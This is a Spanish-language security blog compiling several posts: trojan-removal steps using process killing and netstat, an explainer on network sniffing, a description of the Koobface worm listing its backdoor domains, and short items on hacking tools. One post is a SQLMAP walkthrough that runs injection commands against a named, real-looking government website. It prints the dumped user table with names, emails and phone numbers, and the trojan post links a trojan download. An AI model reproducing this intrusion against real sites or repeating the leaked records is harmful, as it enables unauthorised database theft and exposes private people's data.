domingo, 10 de agosto de 2014

ELIMINAR TROYANOS


COMO LIBRARSE DE UN TROYANO 
Cuando uno ejecuta el MataProcesos un icono (una señal de STOP) se coloca en la barra de tareas. si queremos cerrar un programa rapidamente (alguno que se colgó, o de esos que no aparecen en el CTR-ALT-DEL, como por ejemplo UN BACKDOOR como el patch del NetBus, si es que algun "vivo" nos lo metió) haremos doble click en el STOP y se abrirá una ventana con un listado de todos los procesos reales que se están ejecutando en el momento, listados por nombre de archivo ejecutable.
Para cerrar (matar) un proceso, basta con hacer doble click en el item de la lista que lo representa, y responder que SI a la pregunta que MataProcesos nos hace cuando pide la confirmación.
Notemos que dije que con MataProcesos podemos matar a "todos los procesos", lo cual incluye también a los procesos vitales del Windows, por lo que la primera vez, por falta de experiencia, podriamos "matar" al Windows mismo, obligándonos a reiniciar el ordenador.
Este programa es útil, por ejemplo, si estamos siendo víctima de un troyano, es decir, alguien nos está "molestando", mostrando mensajes extraños en nuestra pantalla sin nuestra autorización, mostrandonos imágenes y abriendo y cerrando la bandeja de nuestro CD-ROM...

UTILIZANDO EL MATA PROCESOS PARA LIBERARNOS FÁCILMENTE

En ese caso, estamos frente a un auténtico "Lamer" (que vendría a ser algo así como un tonto que quiere ser Hacker y utiliza programas como el NetBus, Back Orifice, Sub Seven, Donald Dick o NetSphere para asustar o abusarse de los que no saben). ¿Cómo llegó hasta aquí este individuo? El, u otro similar a él, nos pasó un archivo EXE o SCR haciendonos creer que se trataba de algo muy interesante, y cuando (incautos) lo ejecutamos... probablemente no pasó nada, o algo no muy interesante que digamos... Pero en realidad lo que ocurrió fué que acabamos de instalar un "control remoto" para que este "Lamer" pueda controlar nuestro sistema a su antojo. Fuimos vilmente engañados. Ejecutamos, sin saberlo, un troyano.
Tenemos que apurarnos a quitarnoslo de encima, porque por el momento también tiene acceso a nuestros archivos, para robarlos o borrarlos.
El modo de usar el MataProcesos en este caso sería simplemente seleccionar el proceso adecuado (el del troyano) y terminarlo.
Cómo reconocemos al troyano? Bueno, suponiendo que la lista que MataProcesos nos muestra es la siguiente:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSVR32.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\WINDOWS\PATCH.EXE
C:\WINDOWS\WINDOW.EXE
C:\WINDOWS\SYSTEM\ .EXE
C:\WINDOWS\SYSTEM\NSSX.EXE
C:\WINDOWS\RNAAPP.EXE
C:\WINDOWS\TAPISVR.EXE
C:\ARCHIVOS DE PROGRAMA\ICQ\ICQ.EXE
C:\ARCHIVOS DE PROGRAMA\OUTLOOK EXPRESS\MSIMN.EXE
C:\ARCHIVOS DE PROGRAMA\MATAPROCESOS\MATAPROCESOS.EXE

En este caso nos encontramos con un ordenador LLENO DE TROYANOS, es decir, su seguridad ha sido totalmente violada. ¿Cómo nos damos cuenta de eso?
Hace falta estar acostumbrado al MataProcesos, en otras palabras, saber el proceso que cada archivo está ejecutando.
Si tenemos en cuenta que es muy dificil que un troyano se instale en otro lado que no sea los directorios WINDOWS o SYSTEM, ya descartamos tres posibilidades (las tres últimas, pero es más seguro descartarlas cuando conocemos la función de cada una de ellas), veamos:
C:\ARCHIVOS DE PROGRAMA\ICQ\ICQ.EXE
es ni más ni menos que el ICQ, si lo matamos, se nos cierra el ICQ.
C:\ARCHIVOS DE PROGRAMA\OUTLOOK EXPRESS\MSIMN.EXE
se trata, como se podrán imaginar, del Outlook Express.
C:\ARCHIVOS DE PROGRAMA\MATAPROCESOS\MATAPROCESOS.EXE
este es tanto o más obvio que los anteriores, nosotros mismos acabamos de ejecutarlo.
También hay que conocer otros procesos comunes de Windows, ¿y cómo lo hacemos? si se trata de algunos de los que ya nombré, yo mismo voy a presentarselos, pero si son otros que no se mustran aquí, probablemente con el método de "prueba y error".
Veamos:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
Este es el "corazón" del Windows, si lo cerramos, tendremos que reiniciar.
C:\WINDOWS\SYSTEM\MSGSVR32.EXE
Este es una utilidad interna, si la cerramos el sistema probablemente pierda estabilidad.
C:\WINDOWS\SYSTEM\mmtask.tsk
Cerrar este es imposible. Siempre vuelve a aparecer. Tiene que ver con las tareas multimedia que el Windows realiza.
C:\WINDOWS\EXPLORER.EXE
Se trata del explorador. Gestiona tanto al Internet Explorer como al Windows Explorer. También gestiona la barra de tareas. Si lo cerramos se nos cierran estas tres cosas. (Generalmente se vuelve a ejecutar automáticamente)
C:\WINDOWS\TASKMON.EXE
Es el monitor de tareas de Windows. Si lo cerramos aparentemente no ocurre nada, pero no recomiendo cerrar procesos sin saber exactamente qué función cumplen, a menos que no nos moleste vernos obligados a reiniciar...
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
Es el "parlantito" (la bocinita) que aparece en la barra de tareas, el programa que nos dá el control del volumen de sonidos de Windows. Si lo cerramos, el parlante (la bocina) desaparece.
C:\WINDOWS\RNAAPP.EXE C:\WINDOWS\TAPISVR.EXE
Estos dos son los que se ejecutaron cuando nos conectamos a Internet. Si los cerramos la conexión se corta y no podremos volver a conectarnos hasta reiniciar la computadora.
Pues bien, ¿qué nos queda?
C:\WINDOWS\PATCH.EXE C:\WINDOWS\WINDOW.EXE C:\WINDOWS\SYSTEM\ .EXE C:\WINDOWS\SYSTEM\NSSX.EXE
¡Ja! se trata ni más ni menos que de ¡cuatro troyanos! Toda una exageración... Nuestra seguridad (la de nuestros archivos) se ve totalmente violada por culpa de cada uno de estos procesos... ¿Cómo podemos estar seguros de que se trata de troyanos? Eso lo explico en el apartado que viene, pero en el caso de estos cuatro, basta con decir que ya son tán famosos que no hace falta hacer las comprobaciones...
C:\WINDOWS\PATCH.EXE
es el maldito patch del NETBUS
C:\WINDOWS\SYSTEM\ .EXE
es el servidor del Back Orifice
C:\WINDOWS\SYSTEM\NSSX.EXE
es el servidor del NetSphere
C:\WINDOWS\WINDOW.EXE
es un troyano, aunque no sé exactamente cuál... (probablemente SubSeven o una versión levemente modificada del NetBus)
Matando a LOS CUATRO podemos continuar navegando tranquilos, ya que el agresor perdió totalmente su poder. PERO CUIDADO, nuestro sistema seguramente fué modificado para que estos programas se ejecuten cada vez que arrancamos, y como el MataProceso no los borra del disco, sino simplemente los erradica de la memoria, no estamos a salvo de que la próxima vez que reiniciemos ¡los troyanos estén nuevamente allí!
Para librarnos de ellos para siempre leamos los siguientes puntos...
Aclaraciones:
Para que el MataProcesos funcione hace falta tener instalados los 'runtimes' de Visual Basic 5. Si no los tenés los podés conseguir en:
ftp://ftp.simtel.net/pub/simtelnet/win95/dll/vb500a.zip
o en el mirror: ftp://ftp.cdrom.com/pub/simtelnet/win95/dll/vb500a.zip

2) Mataprocesos y Netstat, suficiente para erradicar cualquier troyano
Existe una aplicación llamada Netstat, y está ubicada en C:\WINDOWS. Con ella y la ayuda del MataProcesos podemos limpiar nuestra PC de troyanos.
Para hacerlo correctamente hay que seguir los siguientes pasos:
a) Nos desconectamos de Internet
b) Cerramos todas las aplicaciones que utilicen conexiones a Internet, por ejemplo: ICQ - Internet Explorer o Netscape - GetRight - Go!Zilla - Telnet - mIRC - MSChat - Outlook - Outlook Express - etc...
c) Ejecutamos el MataProcesos
d) Ejecutamos una ventana de DOS
e) En la línea de comandos del DOS tecleamos "netstat -a" y tomamos nota de todos los "puertos" que aparecen como "abiertos", estos aparecen en la columna "Dirección local" con el formato: <nombre_de_nuestra_pc>:<puerto>
Por ejemplo, podríamos tener el siguiente listado:
Proto
Dirección local
Dirección remota
Estado
TCP
Donatien:6711
0.0.0.0:0
LISTENING
TCP
Donatien:6776
0.0.0.0:0
LISTENING
TCP
Donatien:30100
0.0.0.0:0
LISTENING
TCP
Donatien:30101
0.0.0.0:0
LISTENING
TCP
Donatien:30102
0.0.0.0:0
LISTENING
TCP
Donatien:1243
0.0.0.0:0
LISTENING
TCP
Donatien:1035
0.0.0.0:0
LISTENING
UDP
Donatien:1035
*:*

Lo cual significa que tenemos procesos en nuestro ordenador que están esperando conección en los puertos: 6711, 6776, 30100, 30101, 30102, 1234, y 1035.
f) Comenzamos a matar, uno por uno, los procesos que no sabemos que función cumplen. Si matamos alguno que no debíamos, y el ordenador se bloquea, ya sabemos para la próxima vez que ese proceso no es un troyano, y que no hay que matarlo
Ejemplo: decido matar al proceso llamado:
C:\WINDOWS\SYSTEM\NSSX.EXE
que es muy sospechoso...
Acto seguido, volvemos a la ventana de DOS y pedimos otro listado de "Netstat -a", que nos devuelve lo siguiente:
Proto
Dirección local
Dirección remota
Estado
TCP
Donatien:6711
0.0.0.0:0
LISTENING
TCP
Donatien:6776
0.0.0.0:0
LISTENING
TCP
Donatien:1243
0.0.0.0:0
LISTENING
TCP
Donatien:1035
0.0.0.0:0
LISTENING
UDP
Donatien:1035
*:*

Por suspuesto!!! Se han cerrado tres puertos!! (30100, 30101 y 30102, que ya no aparecen en el listado) Al estar seguros que NSSX.EXE no pertenece a ningún programa que nosotros hayamos instalado, y de que el sistema continúa ejecutándose sin ningún problema (o sea que no era parte del Windows), podemos cambiarle el nombre al archivo para que no se vuelva a ejecutar la próxima vez que reiniciemos. Para eso usamos el comando "RENAME C:\WINDOWS\SYSTEM\NSSX.EXE C:\WINDOWS\SYSTEM\NSSX.EX_".
Nótese que tán solo le cambiamos la extensión, para, en caso de habernos equivocado, recuperar el archivo fácilmente.
Podemos renombrar al archivo debido a que ya lo matamos. Si el proceso estuviera ejecutándose no podríamos modificar ni borrar el NSSX.EXE
Otro modo de cambiarle el nombre es ir con el Explorador hasta el directorio C:\WINDOWS\SYSTEM, buscar el archivo NSSX.EXE y situados sobre él presionar F2, escribir el nuevo nombre y .
Ahora, aunque no es del todo indispensable, y no es recomendable para los novatos absolutos, podríamos abrir el registro de windows con el REGEDIT y eliminar la entrada que antes ejecutaba el troyano cada vez que encendíamos la máquina. La entrada está dentro de la rama: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run y es la siguiente: "NSSX" y su valor es "C:\WINDOWS\system\nssx.exe"
Para borrarla basta con marcarla con el mouse, pulsar DEL, y confirmar.
Es importante no andar borrando cualquier cosa del registro. Para aprender más sobre qué es el registro y qué programas ejecuta Windows al arrancar, lean la emisión Nro. 16 de esta misma revista en http://dzone.findhere.com . Allí también aprenderán que la rama del registro "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" no es el unico lugar en el cual un troyano puede asegurarse el ser ejecutado en cada sesión.
El caso de este ejemplo se trataba del famoso NetSphere, un troyano bastante nuevo, que se puede descargar de http://angelfire.com/ar/NetSphere/index2.html . Pueden usarlo para practicar, pero por favor, no sean "Lamers", no lo usen con otras personas, porque dejarían sus máquinas a merced de cualquiera, y si lo usan con ustedes mismos, tengan en cuenta de que no deben conectarse a Internet mientras tengan el troyano instalado. (justamente, para evitar eso es que explico todo esto).
Sigamos con otro ejemplo, sabemos que la lista del "Netstat -a" es ahora más corta:

Proto
Dirección local
Dirección remota
Estado
TCP
Donatien:6711
0.0.0.0:0
LISTENING
TCP
Donatien:6776
0.0.0.0:0
LISTENING
TCP
Donatien:1243
0.0.0.0:0
LISTENING
TCP
Donatien:1035
0.0.0.0:0
LISTENING
UDP
Donatien:1035
*:*

Pues bien, ahora procedamos a cerrar el proceso: C:\WINDOWS\WINDOW.EXE
El sistema sigue perfectamente estable, y volvemos a pedir el "Netstat -a" y...
Proto
Dirección local
Dirección remota
Estado
TCP
Donatien:1035
0.0.0.0:0
LISTENING
UDP
Donatien:1035
*:*

Ohhhhh!! Se han cerrado otros tres puertos! (aclaro que un troyano no necesariamente utiliza 3 puertos, puede utilizar más, o menos).
Próximo paso: renombramos el archivo para que no vuelva a ejecutarse nunca más, vamos a la ventana de DOS, y escribimos: "RENAME C:\WINDOWS\WINDOW.EXE C:\WINDOWS\WINDOW.EX_"
Como ya dije, también podemos eliminar la entrada del registro que lo ejecuta, pero como, habiendo renombrado el archivo, ya no es necesario, lo dejo librado al lector.
Como en mi caso, por experiencia, sé que el puerto 1035 no se trata de un troyano, no voy a continuar matando procesos, pero si tuviera más puertos abiertos, (en el ejemplo que dí al principio había cuatro troyanos y no dos) continuaría haciendolo hasta encontrarlos todos.
Quiero aclarar que no es muy comun que un ordenador esté lleno de troyanos como en estos ejemplos, pero si notan que alguien está molestándolos de un modo extraño cuando entran a Internet, intenten con esta "limpieza".
Otra aclaración: Si matan procesos que no son troyanos NO HAY PROBLEMA, lo peor que puede ocurrir es que tengan que reiniciar la máquina. Sólo asegurense de no tener archivos sin grabar (como un documento de Word) para no perderlo, al momento de estar haciendo estas comprobaciones.

También cabe aclarar que, aunque yo no conozco ninguno, pueden existir troyanos más "inteligentes", que no tengan puertos abiertos cuando no estamos conectados, a esos hay que detectarlos por un método diferente, o bien, intentar hacerlo mientras estamos conectados a Internet (aunque en ese caso la cosa se complicaría debido a los demás programas que utilizan Internet -como el ICQ- y abren a su vez sus propios puertos, con lo cual la lista se hace más difícil de interpretar).

SNIFFING

SNIFFING


Quien haya leído un comic alguna vez habrá observado que, cuando se quiere representar a alguno de los personajes llorando o sollozando, se utiliza la palabra inglesa snif. Durante muchos años pensé que esa palabra signifcaba llorar pero al cabo de un tiempo me enteré de que su verdadero significado era algo así como sorber.

Un sniffer es un programa que sorbe datos de la red. Todo lo que pasa por delante de sus narices lo absorbe y lo almacena para su análisis posterior. De esta forma, sin poseer acceso a ningún sistema de la red, se puede obtener información, claves de acceso o incluso mensajes de correo electrónico en el que se envían estas claves.

La forma más habitual de sniffing, probablemente porque está al alcance de cualquiera, es la que podríamos llamar sniffing por software, utilizando un programa que captura la información de la red.

También es posible hacer lo que podríamos llamar sniffing hardware, que pasaría por pinchar en un cable de red un dispositivo que permita capturar el tráfico.

Con relación a este último tipo, la expresión "pinchar el cable de red" es una expresión general que incluye el propio hecho de conectar un dispositivo a un cable de la red pero también incluye, por ejemplo, un receptor de radio que se sitúa en medio de un radioenlace. Como os podéis imaginar, este tipo de técnicas requiere de unos conocimientos de electrónica adicionales muy importantes. En este artículo vamos a tratar lo que hemos llamado sniffers software, ya que existe una gran cantidad de ellos y el lector podrá probarlos, detectarlos y eliminarlos en su propia casa sin necesidad de molestar a nadie. 


IDEA GENERAL


Como acabamos de decir, un sniffer captura todos los paquetes que pasan por delante de la máquina en la que está instalado. Esto quiere decir que un sniffer no es un objeto mágico que una vez lanzado puede ver todo lo que sucede en la red. Dicho de otra forma, un usuario que se conecte a Internet vía módem e instale un sniffer en su máquina sólo podrá capturar los paquetes de información que salgan o lleguen a su máquina.

El entorno en el que suele ser más efectivo este tipo de programas es en una Red de Área Local (LAN), montada con la topología tipo bus. En este tipo de redes todas las máquinas están conectadas a un mismo cable, que recibe el nombre de bus, y por lo tanto, todo el tráfico transmitido y recibido por todas las máquinas que pertenecen a esa red local pasa por ese cable compartido, lo que en la terminología de redes se conoce como el medio común.

El otro entorno natural de los sniffers es una máquina víctima. En este caso, es necesario tener acceso a la máquina victima para instalar el programa y el objetivo perseguido aquí es robar información que permita el acceso a otras máquinas, a las que habitualmente se accede desde esa máquina víctima.

Los sniffers funcionan por una sencilla razón: muchos de los protocolos de acceso remoto a las máquinas se transmiten las claves de acceso como texto plano, y por lo tanto, capturando la información que se transmite por la red se puede obtener este tipo de información y el acceso ilegítimo a una determinada máquina. 

martes, 21 de mayo de 2013


NETWORK TOOLKIT ANDROID, HACER UN PENTESITNG…. CADA VEZ MAS A LA MANO.

Bueno en esta oportunidad comparto una herramienta que encontre sobre pentesting en dispositivos móviles android.

esta aplicación es desarrollada por ZImperium LTD  una compañía dedicada a la seguridad en dispositivos móviles con la finalidad de brindar comodidad a la hora de realizar analisis de vulnerabilidades desde dispositivos móviles, recordemos que los dispositivos móviles tienen ahora una gran demanda dentro de la seguridad informática , por esto nace ANTI la cual se puede descargar su versión free desde Aquí.
ANTI nos permite realizar: scannig de puertos, detección de OS, Traceroute, Port connect, Wifi Monitor, HTTP server, Man in The middle, Remote Exploits, y entre otras.

domingo, 19 de mayo de 2013

VIRUS DE FACEBOOK

KoobFace: El virus de Facebook

Koobface, un anagrama de Facebook ("face" y "book" con el orden cambiado y "koob" es "book" al revés, "libro" en inglés), es un Gusano informático que ataca a usuarios de las redes sociales Facebook, MySpace,hi5, Bebo, Friendster y Twitter. Koobface intenta en última instancia, luego de una infección exitosa, obtener información sensible de las víctimas, como números de tarjetas de crédito.
Koobface se disemina enviando un mensaje mediante Facebook a las personas que son 'amigos' de la persona cuyo ordenador ha sido infectado. El mensaje contiene un asunto inocuo como (en ingles) "Paris Hilton Tosses Dwarf On The Street", "LOL", "My Friend catched [sic] you on hidden cam" y "My home video :)" seguido de un link. Después de recibido, el mensaje redirecciona al receptor a un sitio externo no afiliado con Facebook, donde se muestra una supuesta actualización del reproductor Flash de Adobe. Si el archivo es descargado y ejecutado, el ordenador será infectado con Koobface. El virus luego comanda las actividades de navegacion, dirigiendo a los usuarios a sitios web contaminados cuando intentan acceder a motores de busqueda como Google, Yahoo, Bing, y Ask.com. Algunos motores de búsqueda, incluyendo AOL Search, no son afectados por Koobface.

Algunas variantes del virus han sido identificadas:

La funcionalidad de puerta trasera permite a un usuario remoto realizar las siguientes operaciones en el sistema comprometido:
  • Descarga y ejecutar un fichero.
  • Abrir una imagen.
  • Actualizar el código malicioso.
  • Bloquear una dirección IP.
  • Poner un mensaje en Twitter, que es lo que hace de este virus la unica forma de auto-expandirse en internet, ya que, de por si mismo, no es capaz de autoreplicarse.
Abre una puerta trasera en el sistema comprometido y se conecta con uno de los siguientes sitios web:
  • www.trisem.com/achche
  • www.rd040609-cgpay.com/achche
  • www.upr0306.com/achche
  • www.rjulythree.com/achche
  • www.uthreejuly.com/achche
  • www.mymegadomain03072009.com/achche

Como saber si se está infectado con el Koobface.C. ¿Como saber si tienes el Koobface.C?

En caso de que aparezcan en tu ordenador los siguientes ficheros:
  • %Windir%\twitty[DOS NÚMEROS].exe
  • %Windir\%tw[CINCO NÚMEROS].dat
Y en el registro de Windows las siguientes claves
  • Clave:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • Valor: “systwtray” = “%Windir%\twitty[TWO DIGIT NUMBER].exe”

Como eliminar y quitar el Koobface.C

Para eliminar el Koobface.C intente restaurar el sistema a una fecha anterior a la infección, a un punto de restauración anterior, en caso de que sepa cuando fué infectado. Recuerde que esto también afectará a los programas y ficheros que usted haya podido modificar, crear o instalar a posteriori de la fecha de restauración.
En caso de que no funcione o no pueda restaurar el sistema, para quitar el FakePowav.B pruebe lo siguiente:
  1. Desactivar temporalmente la Restauración del Sistema.
  2. Reiniciar el ordenador a Modo a Prueba de Fallos.
  3. Con un antivirus actualizado, borre y ataque todos los archivos infectados.
  4. Elimine los archivos explicados en ¿Como saber si está infectado?
  5. En caso de no poder eliminar el virus por estar en ejecución, abra el Administrador de Tareas y detenga el nombre del Proceso que esté trabajando en ese momento activo por el virus y vuelva al paso numero 4.
  6. Edite el registro y elimine los parámetros explicados en ¿Como saber si está infectado?
  7. Eliminar archivos temporales
  8. Reiniciar el ordenador





domingo, 12 de mayo de 2013

EXPLOTANDO VULNERABILIDADES



Explotando Vulnerabilidades de Inyección SQL desde SQLMAP






Hola, en la entrada anterior explique como explotar Inyección SQL manualmente, entonces hoy escribiré como explotar las vulnerabilidades de Inyección SQL desde la herramienta SQLMAP, solo explicare las funciones básicas de esta herramienta para obtener algunas base de datos de los sitios webs vulnerables.

¿Que es SQLMAP?

Sqlmap es una herramienta desarrollada en python para realizar inyección de código sql automáticamente. Su objetivo es detectar y aprovechar las vulnerabilidades de inyección SQL en aplicaciones web. Una vez que se detecta una o más inyecciones SQL en el host de destino, el usuario puede elegir entre una variedad de opciones entre ellas, enumerar los usuarios, los hashes de contraseñas, los privilegios, las bases de datos , O todo el volcado de tablas / columnas específicas del DBMS , ejecutar  su propio SQL SELECT, leer archivos específicos en el sistema de archivos y mucho más.

Características

  • Soporte completo para MySQL, Oracle, PostgreSQL y Microsoft SQL. Además de estos cuatro sistemas de gestión de bases de datos, sqlMap también puede identificar Microsoft Access, DB2, Informix, Sybase y Interbase.
  • Amplia base de datos de sistema de gestión de huellas dactilares basadas en inband error messages, analizar el banner, las funciones de salida de comparación y características específicas tales como MySQL comment injection. También es posible forzar a la base de datos de sistema de gestión de nombre si ya lo saben.
  • Soporte completo para 2 técnicas de SQL injection: blind SQL injection y inband SQL injection.

Comandos Básicos:
-u 
-D
-T
-C
--tables
--columns
--dump

Ubicación en BackTrack 5r2:
Aplicaciones - BackTrack - Exploitation Tools - Web Exploitation Tools - SqlMap

Teniendo la herramienta lista para su uso, buscaremos una web vulnerable, en este caso yo usare la siguiente:

http://www.fonep.gob.ve/noticias.php?id=195'
SQL/DB Error -- [

    Could not execute query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''195'' AND c.publicado_contenido != 0' at line 13

Como vemos la web es vulnerable a Inyeccion SQL, entonces nos dirigimos a la herramienta para explotar dicha vulnerabilidad.

El primer comando que tenemos que colocar para obtener la base de datos sera esta:

./sqlmap.py -u http://www.fonep.gob.ve/noticias.php?id=195 --dbs

La herramienta auditara el sitio y comprobara si es vulnerable, entonces si la herramienta comprueba que el sitio es vulnerable, automáticamente nos arrojara la base de datos, en este caso me la arrojo:

available databases [2]:
[*] information_schema
[*] penof_cms

Bien, teniendo ya la base de datos, la que nos interesaría en este caso seria penof_cms, entonces para obtener las tablas de dicha db, colocaremos el siguiente comando:

./sqlmap.py -u http://www.fonep.gob.ve/noticias.php?id=195 -D penof_cms --tables

Entonces de inmediato la herramienta nos arrojara las tablas de la db que hemos solicitado:

Database: penof_cms
[20 tables]
+-------------------+
| fonep_cargos      |
| fonep_ciudades    |
| fonep_contacto    |
| fonep_contenido   |
| fonep_contratista |
| fonep_documentos  |
| fonep_ds          |
| fonep_empleo      |
| fonep_enlaces     |
| fonep_errores     |
| fonep_estados     |
| fonep_extras      |
| fonep_log         |
| fonep_media       |
| fonep_rextras     |
| fonep_rsecciones  |
| fonep_rtagcloud   |
| fonep_secciones   |
| fonep_tagcloud    |
| fonep_usuarios    |
+-------------------+

Bien, ahora como a nosotros en toda inyección sql, nos interesa la tabla usuarios, colocaremos el siguiente comando para ver sus columnas:

./sqlmap.py -u http://www.fonep.gob.ve/noticias.php?id=195 -D penof_cms -T fonep_usuarios --columns

La cual la herramienta nos arroja todas las columnas de la tabla usuarios:

Database: penof_cms
Table: fonep_usuarios
[9 columns]
+-----------------------+-----------------+
| Column                | Type            |
+-----------------------+-----------------+
| apellido_usuarios     | varchar(45)     |
| clave_usuarios        | varchar(40)     |
| email_usuarios        | varchar(255)    |
| id_usuarios           | int(2) unsigned |
| institucion_usuarios  | varchar(45)     |
| nombre_usuarios       | varchar(45)     |
| permisos_usuarios     | tinyint(4)      |
| telf_usuarios         | int(11)         |
| ultimoacceso_usuarios | datetime        |
+-----------------------+-----------------+

Si queres todo el contenido de dicha columna, en este caso fonep_usuarios, solo colocaremos este comando:

./sqlmap.py -u http://www.fonep.gob.ve/noticias.php?id=195 -D penof_cms -T fonep_usuarios --dump

Entonces la herramienta dumpeara todo el contenido.

En este caso yo solo necesito las columnas apellido_usuarios, email_usuarios, nombre_usuarios, telf_usuarios, la cual colocaremos el siguiente comando:

./sqlmap.py -u http://www.fonep.gob.ve/noticias.php?id=195 -D penof_cms -T fonep_usuarios -C "apellido_usuarios,email_usuarios,nombre_usuarios,telf_usuarios" --dump

Database: penof_cms
Table: fonep_usuarios
[3 entries]
+-------------------+----------------------------+-----------------+---------------+
| apellido_usuarios | email_usuarios             | nombre_usuarios | telf_usuarios |
+-------------------+----------------------------+-----------------+---------------+
| Olivo             | ernesto.olivo@ingenian.net | Ernesto         | 8886591       |
| Gimenez           | lugimenez@cantv.net        | Luis            | 2122112323    |
| Gonzalez Aviles   | serser2020@gmail.com       | Sergio          | 2147483647    |
+-------------------+----------------------------+-----------------+---------------+

Entonces, con ese comando obtendremos los datos específicos de dicha base de datos.

¿No entendiste?

No te preocupes, te dejare un video de esta inyeccion:


[Armitage] Administrador Gráfico de Cyber Ataques para Metasploit

Armitage es un Administrador Gráfico de Cyber Ataques para Metasploit que sirve para visualizar gráficamente tus objetivos, el mismo programa te recomienda que exploit usar, expone las opciones avanzadas del framework (esas que comúnmente se nos olvida o no sabemos), desde el mismo Armintage podemos iniciar un análisis con Nmap, e incluso se puede usar el módulo de Brute Force para sacar username/password.

El objetivo de Armitage es hacer Metasploit útil para los profesionales de seguridad que saben hacking, pero no el uso de Metasploit a fondo. Si desean aprender las características avanzadas de Metasploit, Armitage será de gran ayuda.
Es una herramienta impresionante y muy intuitiva, considero que la herramienta viene como anillo al dedo para los usuarios de Windows que están más acostumbrados a usar el mouse que el teclado (no como los usuarios de GNU/Linux que es al revés). Lo mejor de todo es que se encuentra para los 2 sistemas operativos.
Aquí les dejo 2 Videos oficiales de esta excelente herramienta, disfrútenlos:
Video Explicativo de Armitage (Está en inglés pero bastante entendible):

En acción: 


Para terminar un enlace a la web oficial donde pueden descargar el Armitage tanto para GNU/Linux como para Windows: http://www.fastandeasyhacking.com/download


BUSCANDO UN CPANEL

Panel (acrónimo de control Panel) es una herramienta de administración basado en tecnologías web para administrar sitios de manera fácil, con una interfaz limpia. Se trata de un software no libre disponible para un gran número de distribuciones de Linux que soporten RPM, como SuSE, Fedora, Mandriva, etc. El soporte preliminar es para Debian, se debió solicitar que saliera del estado beta por varios años, y para el cual no posee soporte. A cPanel se accede por los puertos 2082 y 2083 (para versiones de SSL). La autenticación es por HTTP o una página de ingreso.
Se diseñó para el uso comercial de servicios de alojamiento web, es por esto que la compañía no lo ofrece con licencia de uso personal. Sin embargo, los dueños de organizaciones sin fines de lucro, como instituciones educacionales y caridad pueden solicitar una licencia sin costo.
Está disponible sólo para sistemas operativos basados en Linux, pero las versiones para Solaris, Microsoft Windows y Mac OS Xestán desarrollándose.

En este video demostraremos lo sencillo que es conseguir el panel de control 
espero que les sirva de algo no se olviden de comentar.